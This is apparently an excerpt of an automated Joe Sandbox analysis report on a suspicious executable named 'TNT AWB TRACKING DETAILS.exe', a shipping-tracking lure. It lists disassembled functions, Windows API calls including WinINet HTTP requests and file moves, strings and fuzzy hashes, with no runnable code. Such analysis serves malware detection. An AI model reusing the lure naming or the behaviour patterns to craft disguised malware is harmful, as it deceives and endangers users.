                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0
                                      • API String ID: 161812096-4108050209
                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                      Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe), ref: 00434057
                                      • LoadStringW.USER32(00000000), ref: 00434060
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                      • LoadStringW.USER32(00000000), ref: 00434078
                                      • _wprintf.LIBCMT ref: 004340A1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                      Strings
                                      • C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, xrefs: 00434040
                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 3648134473-1828596950
                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                      Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                      • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                      Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                      • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                      Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,0040F545,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,004A90E8,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                      • String ID:
                                      • API String ID: 978794511-0
                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                      Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                      Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                      Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$_memcmp
                                      • String ID: '$\$h
                                      • API String ID: 2205784470-1303700344
                                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                      Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                      • VariantClear.OLEAUT32 ref: 0045EA6D
                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                      • __swprintf.LIBCMT ref: 0045EC33
                                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                      Strings
                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d
                                      • API String ID: 2441338619-1568723262
                                      • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                      • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                      Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID: @COM_EVENTOBJ
                                      • API String ID: 327565842-2228938565
                                      • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                      • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                      Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantClear.OLEAUT32(?), ref: 0047031B
                                      • VariantClear.OLEAUT32(?), ref: 0047044F
                                      • VariantInit.OLEAUT32(?), ref: 004704A3
                                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                      • VariantClear.OLEAUT32(?), ref: 00470516
                                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                                      • String ID: H
                                      • API String ID: 3613100350-2852464175
                                      • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                      • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                      Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                      • DestroyWindow.USER32(?), ref: 00426F50
                                      • UnregisterHotKey.USER32(?), ref: 00426F77
                                      • FreeLibrary.KERNEL32(?), ref: 0042701F
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 4174999648-3243417748
                                      • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                      • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                      • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                      • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                      Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 1291720006-3916222277
                                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                      Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                      • IsMenu.USER32(?), ref: 0045FC5F
                                      • CreatePopupMenu.USER32 ref: 0045FC97
                                      • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID: 0$2
                                      • API String ID: 93392585-3793063076
                                      • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                      • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                      • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                      • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                      Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                      • VariantClear.OLEAUT32(?), ref: 00435320
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                      • VariantClear.OLEAUT32(?), ref: 004353B3
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                      • String ID: crts
                                      • API String ID: 586820018-3724388283
                                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
